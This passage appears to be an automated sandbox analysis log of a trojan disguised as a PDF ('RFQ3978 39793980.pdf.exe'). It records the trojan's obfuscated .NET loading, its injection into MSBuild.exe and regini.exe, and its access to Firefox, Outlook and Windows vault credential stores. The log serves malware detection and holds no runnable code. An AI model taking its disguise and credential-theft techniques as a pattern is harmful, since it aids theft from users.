                Source: C:\Windows\SysWOW64\regini.exe Code function: 7_2_02DB3010 NtOpenDirectoryObject,7_2_02DB3010
                Source: C:\Windows\SysWOW64\regini.exe Code function: 7_2_02DB3D70 NtOpenThread,7_2_02DB3D70
                Source: C:\Windows\SysWOW64\regini.exe Code function: 7_2_02DB3D10 NtOpenProcessToken,7_2_02DB3D10
                Source: C:\Windows\SysWOW64\regini.exe Code function: 7_2_004C9160 NtCreateFile,7_2_004C9160
                Source: C:\Windows\SysWOW64\regini.exe Code function: 7_2_004C92D0 NtReadFile,7_2_004C92D0
                Source: C:\Windows\SysWOW64\regini.exe Code function: 7_2_004C93D0 NtDeleteFile,7_2_004C93D0
                Source: C:\Windows\SysWOW64\regini.exe Code function: 7_2_004C9480 NtClose,7_2_004C9480
                Source: C:\Windows\SysWOW64\regini.exe Code function: 7_2_004C95F0 NtAllocateVirtualMemory,7_2_004C95F0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02E37D737_2_02E37D73
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02D83D407_2_02D83D40
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02E31D5A7_2_02E31D5A
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_004B1C307_2_004B1C30
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_004ACAF77_2_004ACAF7
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_004ACB007_2_004ACB00
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_004AAD107_2_004AAD10
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_004ACD207_2_004ACD20
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_004AAE547_2_004AAE54
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_004AAE607_2_004AAE60
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_004B52F07_2_004B52F0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_004B34E07_2_004B34E0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_004CBAE07_2_004CBAE0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_004B9C707_2_004B9C70
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02B1E2887_2_02B1E288
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02B2523C7_2_02B2523C
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02B1E3A37_2_02B1E3A3
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02B1E73C7_2_02B1E73C
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02B1E50B7_2_02B1E50B
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02B1E8C27_2_02B1E8C2
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02B1D8087_2_02B1D808
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: String function: 0119F290 appears 103 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: String function: 01167E54 appears 110 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: String function: 0110B970 appears 280 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: String function: 01155130 appears 58 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: String function: 0118EA12 appears 86 times
                Source: C:\Windows\SysWOW64\regini.exe | Code function: String function: 02DB5130 appears 58 times
                Source: C:\Windows\SysWOW64\regini.exe | Code function: String function: 02D6B970 appears 262 times
                Source: C:\Windows\SysWOW64\regini.exe | Code function: String function: 02DEEA12 appears 86 times
                Source: C:\Windows\SysWOW64\regini.exe | Code function: String function: 02DC7E54 appears 107 times
                Source: C:\Windows\SysWOW64\regini.exe | Code function: String function: 02DFF290 appears 103 times
                Source: RFQ3978 39793980.pdf.exe, 00000000.00000002.2083511223.000000000A120000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameMontero.dll8 vs RFQ3978 39793980.pdf.exe
                Source: RFQ3978 39793980.pdf.exe, 00000000.00000002.2081239429.0000000004F10000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameArthur.dll" vs RFQ3978 39793980.pdf.exe
                Source: RFQ3978 39793980.pdf.exe, 00000000.00000002.2077632944.0000000003F84000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameMontero.dll8 vs RFQ3978 39793980.pdf.exe
                Source: RFQ3978 39793980.pdf.exe, 00000000.00000002.2077632944.0000000003764000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameArthur.dll" vs RFQ3978 39793980.pdf.exe
                Source: RFQ3978 39793980.pdf.exe, 00000000.00000002.2076558141.000000000094E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs RFQ3978 39793980.pdf.exe
                Source: RFQ3978 39793980.pdf.exe, 00000000.00000000.1695871540.0000000000402000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameXliF.exe, vs RFQ3978 39793980.pdf.exe
                Source: RFQ3978 39793980.pdf.exe | Binary or memory string: OriginalFilenameXliF.exe, vs RFQ3978 39793980.pdf.exe
                Source: RFQ3978 39793980.pdf.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: RFQ3978 39793980.pdf.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 7.2.regini.exe.336cd14.3.raw.unpack, TaskParameter.cs | Task registration methods: 'CreateNewTaskItemFrom'
                Source: 7.2.regini.exe.336cd14.3.raw.unpack, OutOfProcTaskHostNode.cs | Task registration methods: 'RegisterTaskObject', 'UnregisterPacketHandler', 'RegisterPacketHandler', 'UnregisterTaskObject', 'GetRegisteredTaskObject'
                Source: 7.2.regini.exe.336cd14.3.raw.unpack, TaskLoader.cs | Task registration methods: 'CreateTask'
                Source: 7.2.regini.exe.336cd14.3.raw.unpack, RegisteredTaskObjectCacheBase.cs | Task registration methods: 'GetLazyCollectionForLifetime', 'RegisterTaskObject', 'DisposeObjects', 'IsCollectionEmptyOrUncreated', 'UnregisterTaskObject', 'DisposeCacheObjects', 'GetRegisteredTaskObject', 'GetCollectionForLifetime'
                Source: 0.2.RFQ3978 39793980.pdf.exe.41c1b18.4.raw.unpack, IJ6UC68YOxsykVHtee.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 7.2.regini.exe.27cda98.0.raw.unpack, CommunicationsUtilities.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 7.2.regini.exe.27cda98.0.raw.unpack, CommunicationsUtilities.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.RFQ3978 39793980.pdf.exe.424c338.1.raw.unpack, IJ6UC68YOxsykVHtee.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 8.2.shazRxxmQwU.exe.317cd14.1.raw.unpack, CommunicationsUtilities.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 8.2.shazRxxmQwU.exe.317cd14.1.raw.unpack, CommunicationsUtilities.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.RFQ3978 39793980.pdf.exe.a120000.6.raw.unpack, hu0NnvCl5pXqnShn53.cs | Security API names: _0020.SetAccessControl
                Source: 0.2.RFQ3978 39793980.pdf.exe.a120000.6.raw.unpack, hu0NnvCl5pXqnShn53.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.RFQ3978 39793980.pdf.exe.a120000.6.raw.unpack, hu0NnvCl5pXqnShn53.cs | Security API names: _0020.AddAccessRule
                Source: 0.2.RFQ3978 39793980.pdf.exe.41c1b18.4.raw.unpack, hu0NnvCl5pXqnShn53.cs | Security API names: _0020.SetAccessControl
                Source: 0.2.RFQ3978 39793980.pdf.exe.41c1b18.4.raw.unpack, hu0NnvCl5pXqnShn53.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.RFQ3978 39793980.pdf.exe.41c1b18.4.raw.unpack, hu0NnvCl5pXqnShn53.cs | Security API names: _0020.AddAccessRule
                Source: 0.2.RFQ3978 39793980.pdf.exe.a120000.6.raw.unpack, IJ6UC68YOxsykVHtee.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.RFQ3978 39793980.pdf.exe.424c338.1.raw.unpack, hu0NnvCl5pXqnShn53.cs | Security API names: _0020.SetAccessControl
                Source: 0.2.RFQ3978 39793980.pdf.exe.424c338.1.raw.unpack, hu0NnvCl5pXqnShn53.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.RFQ3978 39793980.pdf.exe.424c338.1.raw.unpack, hu0NnvCl5pXqnShn53.cs | Security API names: _0020.AddAccessRule
                Source: 7.2.regini.exe.27cda98.0.raw.unpack, NodeEndpointOutOfProcBase.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent(bool)
                Source: 7.2.regini.exe.27cda98.0.raw.unpack, NodeEndpointOutOfProcBase.cs | Security API names: System.IO.Pipes.PipeSecurity.AddAccessRule(System.IO.Pipes.PipeAccessRule)
                Source: 7.2.regini.exe.27cda98.0.raw.unpack, NodeEndpointOutOfProcBase.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 7.2.regini.exe.336cd14.3.raw.unpack, NodeEndpointOutOfProcBase.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent(bool)
                Source: 7.2.regini.exe.336cd14.3.raw.unpack, NodeEndpointOutOfProcBase.cs | Security API names: System.IO.Pipes.PipeSecurity.AddAccessRule(System.IO.Pipes.PipeAccessRule)
                Source: 7.2.regini.exe.336cd14.3.raw.unpack, NodeEndpointOutOfProcBase.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 8.2.shazRxxmQwU.exe.317cd14.1.raw.unpack, NodeEndpointOutOfProcBase.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent(bool)
                Source: 8.2.shazRxxmQwU.exe.317cd14.1.raw.unpack, NodeEndpointOutOfProcBase.cs | Security API names: System.IO.Pipes.PipeSecurity.AddAccessRule(System.IO.Pipes.PipeAccessRule)
                Source: 8.2.shazRxxmQwU.exe.317cd14.1.raw.unpack, NodeEndpointOutOfProcBase.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 7.2.regini.exe.336cd14.3.raw.unpack, CommunicationsUtilities.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 7.2.regini.exe.336cd14.3.raw.unpack, CommunicationsUtilities.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: regini.exe, 00000007.00000002.3560035805.00000000027CD000.00000004.00000020.00020000.00000000.sdmp, regini.exe, 00000007.00000002.3561717968.000000000336C000.00000004.10000000.00040000.00000000.sdmp, shazRxxmQwU.exe, 00000008.00000002.3561378450.000000000317C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2649875602.000000000D90C000.00000004.80000000.00040000.00000000.sdmp | Binary or memory string: .configAMSBUILDDIRECTORYDELETERETRYCOUNTCMSBUILDDIRECTORYDELETRETRYTIMEOUT.sln
                Source: regini.exe, 00000007.00000002.3560035805.00000000027CD000.00000004.00000020.00020000.00000000.sdmp, regini.exe, 00000007.00000002.3561717968.000000000336C000.00000004.10000000.00040000.00000000.sdmp, shazRxxmQwU.exe, 00000008.00000002.3561378450.000000000317C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2649875602.000000000D90C000.00000004.80000000.00040000.00000000.sdmp | Binary or memory string: MSBuild MyApp.sln /t:Rebuild /p:Configuration=Release
                Source: regini.exe, 00000007.00000002.3560035805.00000000027CD000.00000004.00000020.00020000.00000000.sdmp, regini.exe, 00000007.00000002.3561717968.000000000336C000.00000004.10000000.00040000.00000000.sdmp, shazRxxmQwU.exe, 00000008.00000002.3561378450.000000000317C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2649875602.000000000D90C000.00000004.80000000.00040000.00000000.sdmp | Binary or memory string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb
                Source: regini.exe, 00000007.00000002.3560035805.00000000027CD000.00000004.00000020.00020000.00000000.sdmp, regini.exe, 00000007.00000002.3561717968.000000000336C000.00000004.10000000.00040000.00000000.sdmp, shazRxxmQwU.exe, 00000008.00000002.3561378450.000000000317C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2649875602.000000000D90C000.00000004.80000000.00040000.00000000.sdmp | Binary or memory string: *.sln
                Source: regini.exe, 00000007.00000002.3560035805.00000000027CD000.00000004.00000020.00020000.00000000.sdmp, regini.exe, 00000007.00000002.3561717968.000000000336C000.00000004.10000000.00040000.00000000.sdmp, shazRxxmQwU.exe, 00000008.00000002.3561378450.000000000317C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2649875602.000000000D90C000.00000004.80000000.00040000.00000000.sdmp | Binary or memory string: MSBuild MyApp.csproj /t:Clean
                Source: regini.exe, 00000007.00000002.3560035805.00000000027CD000.00000004.00000020.00020000.00000000.sdmp, regini.exe, 00000007.00000002.3561717968.000000000336C000.00000004.10000000.00040000.00000000.sdmp, shazRxxmQwU.exe, 00000008.00000002.3561378450.000000000317C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2649875602.000000000D90C000.00000004.80000000.00040000.00000000.sdmp | Binary or memory string: /ignoreprojectextensions:.sln
                Source: regini.exe, 00000007.00000002.3560035805.00000000027CD000.00000004.00000020.00020000.00000000.sdmp, regini.exe, 00000007.00000002.3561717968.000000000336C000.00000004.10000000.00040000.00000000.sdmp, shazRxxmQwU.exe, 00000008.00000002.3561378450.000000000317C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2649875602.000000000D90C000.00000004.80000000.00040000.00000000.sdmp | Binary or memory string: MSBUILD : error MSB1048: Solution files cannot be debugged directly. Run MSBuild first with an environment variable MSBUILDEMITSOLUTION=1 to create a corresponding ".sln.metaproj" file. Then debug that.
                Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@7/2@6/6
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RFQ3978 39793980.pdf.exe.log
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exe | Mutant created: NULL
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exe | Mutant created: \Sessions\1\BaseNamedObjects\aGyXbWYnlQdxNP
                Source: C:\Windows\SysWOW64\regini.exe | File created: C:\Users\user\AppData\Local\Temp\7-6E2al6
                Source: RFQ3978 39793980.pdf.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: RFQ3978 39793980.pdf.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                Source: C:\Program Files\Mozilla Firefox\firefox.exe | File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: regini.exe, 00000007.00000002.3560035805.0000000002887000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: unknown | Process created: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exe "C:\Users\user\Desktop\RFQ3978 39793980.pdf.exe"
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                Source: C:\Program Files (x86)\olVPGATOUBXOLYArLwmXYmsTfaxnIbOZayBTJkZykeIPbvMUR\shazRxxmQwU.exe | Process created: C:\Windows\SysWOW64\regini.exe "C:\Windows\SysWOW64\regini.exe"
                Source: C:\Windows\SysWOW64\regini.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exe | Section loaded: mscoree.dll
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exe | Section loaded: apphelp.dll
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exe | Section loaded: kernel.appcore.dll
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exe | Section loaded: version.dll
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exe | Section loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exe | Section loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exe | Section loaded: uxtheme.dll
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exe | Section loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exe | Section loaded: wldp.dll
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exe | Section loaded: profapi.dll
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exe | Section loaded: cryptsp.dll
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exe | Section loaded: rsaenh.dll
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exe | Section loaded: cryptbase.dll
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exe | Section loaded: dwrite.dll
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exe | Section loaded: windowscodecs.dll
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exe | Section loaded: amsi.dll
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exe | Section loaded: userenv.dll
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exe | Section loaded: msasn1.dll
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exe | Section loaded: gpapi.dll
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exe | Section loaded: iconcodecservice.dll
                Source: C:\Windows\SysWOW64\regini.exe | Section loaded: wininet.dll
                Source: C:\Windows\SysWOW64\regini.exe | Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\regini.exe | Section loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\regini.exe | Section loaded: ieframe.dll
                Source: C:\Windows\SysWOW64\regini.exe | Section loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\regini.exe | Section loaded: netapi32.dll
                Source: C:\Windows\SysWOW64\regini.exe | Section loaded: version.dll
                Source: C:\Windows\SysWOW64\regini.exe | Section loaded: userenv.dll
                Source: C:\Windows\SysWOW64\regini.exe | Section loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\regini.exe | Section loaded: wkscli.dll
                Source: C:\Windows\SysWOW64\regini.exe | Section loaded: netutils.dll
                Source: C:\Windows\SysWOW64\regini.exe | Section loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\regini.exe | Section loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\regini.exe | Section loaded: wldp.dll
                Source: C:\Windows\SysWOW64\regini.exe | Section loaded: profapi.dll
                Source: C:\Windows\SysWOW64\regini.exe | Section loaded: secur32.dll
                Source: C:\Windows\SysWOW64\regini.exe | Section loaded: mlang.dll
                Source: C:\Windows\SysWOW64\regini.exe | Section loaded: propsys.dll
                Source: C:\Windows\SysWOW64\regini.exe | Section loaded: winsqlite3.dll
                Source: C:\Windows\SysWOW64\regini.exe | Section loaded: vaultcli.dll
                Source: C:\Windows\SysWOW64\regini.exe | Section loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\regini.exe | Section loaded: dpapi.dll
                Source: C:\Windows\SysWOW64\regini.exe | Section loaded: cryptbase.dll
                Source: C:\Program Files (x86)\olVPGATOUBXOLYArLwmXYmsTfaxnIbOZayBTJkZykeIPbvMUR\shazRxxmQwU.exe | Section loaded: wininet.dll
                Source: C:\Program Files (x86)\olVPGATOUBXOLYArLwmXYmsTfaxnIbOZayBTJkZykeIPbvMUR\shazRxxmQwU.exe | Section loaded: mswsock.dll
                Source: C:\Program Files (x86)\olVPGATOUBXOLYArLwmXYmsTfaxnIbOZayBTJkZykeIPbvMUR\shazRxxmQwU.exe | Section loaded: dnsapi.dll
                Source: C:\Program Files (x86)\olVPGATOUBXOLYArLwmXYmsTfaxnIbOZayBTJkZykeIPbvMUR\shazRxxmQwU.exe | Section loaded: iphlpapi.dll
                Source: C:\Program Files (x86)\olVPGATOUBXOLYArLwmXYmsTfaxnIbOZayBTJkZykeIPbvMUR\shazRxxmQwU.exe | Section loaded: fwpuclnt.dll
                Source: C:\Program Files (x86)\olVPGATOUBXOLYArLwmXYmsTfaxnIbOZayBTJkZykeIPbvMUR\shazRxxmQwU.exe | Section loaded: rasadhlp.dll
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                Source: C:\Windows\SysWOW64\regini.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
                Source: RFQ3978 39793980.pdf.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: RFQ3978 39793980.pdf.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: shazRxxmQwU.exe, 00000006.00000002.3560481153.0000000000B8E000.00000002.00000001.01000000.0000000C.sdmp, shazRxxmQwU.exe, 00000008.00000002.3559802937.0000000000B8E000.00000002.00000001.01000000.0000000C.sdmp
                Source: Binary string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb source: regini.exe, 00000007.00000002.3560035805.00000000027CD000.00000004.00000020.00020000.00000000.sdmp, regini.exe, 00000007.00000002.3561717968.000000000336C000.00000004.10000000.00040000.00000000.sdmp, shazRxxmQwU.exe, 00000008.00000002.3561378450.000000000317C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2649875602.000000000D90C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: MSBuild.exe, 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, regini.exe, 00000007.00000003.2355221160.0000000002B8B000.00000004.00000020.00020000.00000000.sdmp, regini.exe, 00000007.00000002.3561278322.0000000002EDE000.00000040.00001000.00020000.00000000.sdmp, regini.exe, 00000007.00000003.2352532116.00000000029D3000.00000004.00000020.00020000.00000000.sdmp, regini.exe, 00000007.00000002.3561278322.0000000002D40000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: MSBuild.exe, MSBuild.exe, 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, regini.exe, regini.exe, 00000007.00000003.2355221160.0000000002B8B000.00000004.00000020.00020000.00000000.sdmp, regini.exe, 00000007.00000002.3561278322.0000000002EDE000.00000040.00001000.00020000.00000000.sdmp, regini.exe, 00000007.00000003.2352532116.00000000029D3000.00000004.00000020.00020000.00000000.sdmp, regini.exe, 00000007.00000002.3561278322.0000000002D40000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: regini.pdbGCTL source: MSBuild.exe, 00000005.00000002.2352511009.0000000000C88000.00000004.00000020.00020000.00000000.sdmp, shazRxxmQwU.exe, 00000006.00000002.3560223659.00000000007D8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: regini.pdb source: MSBuild.exe, 00000005.00000002.2352511009.0000000000C88000.00000004.00000020.00020000.00000000.sdmp, shazRxxmQwU.exe, 00000006.00000002.3560223659.00000000007D8000.00000004.00000020.00020000.00000000.sdmp

                Data Obfuscation

                Source: RFQ3978 39793980.pdf.exe, ServerForm.cs | .Net Code: InitializeComponent System.AppDomain.Load(byte[])
                Source: 0.2.RFQ3978 39793980.pdf.exe.3764468.0.raw.unpack, MainForm.cs | .Net Code: _202B_200C_200F_200D_200D_202A_206D_202C_200B_200E_202B_206E_206B_206B_206E_200B_200F_206E_200E_202E_200F_202A_200D_200B_206C_206B_200F_200B_200C_206A_206A_200F_202E_200C_206E_200F_206C_206D_202D_202B_202E System.Reflection.Assembly.Load(byte[])
                Source: 0.2.RFQ3978 39793980.pdf.exe.424c338.1.raw.unpack, hu0NnvCl5pXqnShn53.cs | .Net Code: brTLff1Kpe System.Reflection.Assembly.Load(byte[])
                Source: 0.2.RFQ3978 39793980.pdf.exe.a120000.6.raw.unpack, hu0NnvCl5pXqnShn53.cs | .Net Code: brTLff1Kpe System.Reflection.Assembly.Load(byte[])
                Source: 0.2.RFQ3978 39793980.pdf.exe.41c1b18.4.raw.unpack, hu0NnvCl5pXqnShn53.cs | .Net Code: brTLff1Kpe System.Reflection.Assembly.Load(byte[])
                Source: RFQ3978 39793980.pdf.exeStatic PE information: section name: .text entropy: 7.712373186885482
                Source: 0.2.RFQ3978 39793980.pdf.exe.424c338.1.raw.unpack, PBj6MrJ4qttK5WRqmjB.csHigh entropy of concatenated method names: 'ToString', 'TDTb8mnTEa', 'EFCblxU3Lr', 'V08b7EmM42', 'n4Sb0CZMFJ', 'gSmbXTHpNb', 'bnEb5GGBXx', 'C8UbqUcKaV', 'a20PGn6AI5BidqItreu', 'FLrGfZ6TwCB1HlMZYaB'
                Source: 0.2.RFQ3978 39793980.pdf.exe.424c338.1.raw.unpack, hu0NnvCl5pXqnShn53.csHigh entropy of concatenated method names: 'EijvarGhPa', 'NnWvdd0cmB', 'yOOvN8ecZE', 'kdgvIPFCoy', 'TnEvGiDuBa', 'yk7viV3UvK', 'pNMvowNcnT', 'H3vvClx377', 'hGKvgXYikx', 'kA3v6vZcJd'
                Source: 0.2.RFQ3978 39793980.pdf.exe.424c338.1.raw.unpack, uDdPq5SSsTgtCfGult.csHigh entropy of concatenated method names: 'eNTZP6MMyl', 'mt3ZktPjq9', 'IkIDM3IIZI', 'KRQDJINOuh', 'cYNZOad33q', 'IefZ3iwjU4', 'N0bZwgqCMi', 'pOHZt8yR9D', 'TuZZ2MtBXj', 'l1RZynWBvd'
                Source: 0.2.RFQ3978 39793980.pdf.exe.424c338.1.raw.unpack, Cjl5nlWxacufWc9j66.csHigh entropy of concatenated method names: 'WXRodnlCwQ', 'kP5oI3T9wv', 'Es0oiE9eOT', 'cecikcHKIE', 'ja4izASsGl', 'a6DoMBEwMg', 'jKHoJB2v1J', 'trOo4N6BZL', 'YRGovnPsvF', 'CQUoLU9lqa'
                Source: 0.2.RFQ3978 39793980.pdf.exe.424c338.1.raw.unpack, d5iEQbEai2WGGbtQeE.csHigh entropy of concatenated method names: 'I9gVFrZNWX', 'O1eVZH36hq', 'nMdVVpHITq', 'HOgVbv3asX', 'P57VcYd4Ow', 'AAbVhTmncD', 'Dispose', 'shLDdxNoSU', 'iZZDNYcMVm', 's5kDI17Zdh'
                Source: 0.2.RFQ3978 39793980.pdf.exe.424c338.1.raw.unpack, n0Ec4941V8pAeRoCBI.csHigh entropy of concatenated method names: 'jeXffEvAR', 'l7cmNFoPW', 'Ru9uHYoNP', 'OVipeMahW', 'GOcliqjKs', 'JS57fN4hH', 'fScCnVfJ7sMoIF93g3', 'QWbk23iEnK8NcdG8b5', 'oU9DvcPCt', 'vbtR3UpBe'
                Source: 0.2.RFQ3978 39793980.pdf.exe.424c338.1.raw.unpack, slP2qVtvydIdFP1CiV.csHigh entropy of concatenated method names: 'OOkFKLmqsZ', 'w1GF3dN1I6', 'S4tFtCndVo', 'IcOF23xOns', 'cdfFXU4a6n', 'MAlF5lmoPs', 'KPiFqTvC36', 'WeLFehfn0u', 'QFKFQDlVDM', 'qQWFWGhkS6'
                Source: 0.2.RFQ3978 39793980.pdf.exe.424c338.1.raw.unpack, Cuv6qVj0OfZ7uX2GRd.csHigh entropy of concatenated method names: 'Gf7V0tEfP1', 'LGcVXgOOQ5', 'BA1V5HlU8F', 'oRsVq9JmHi', 'UjWVeLDGxr', 'LM8VQadEFL', 'fqyVWsyeiG', 'rp8VUaJ616', 'SEtVrlihgb', 'Q5kVKR2E10'
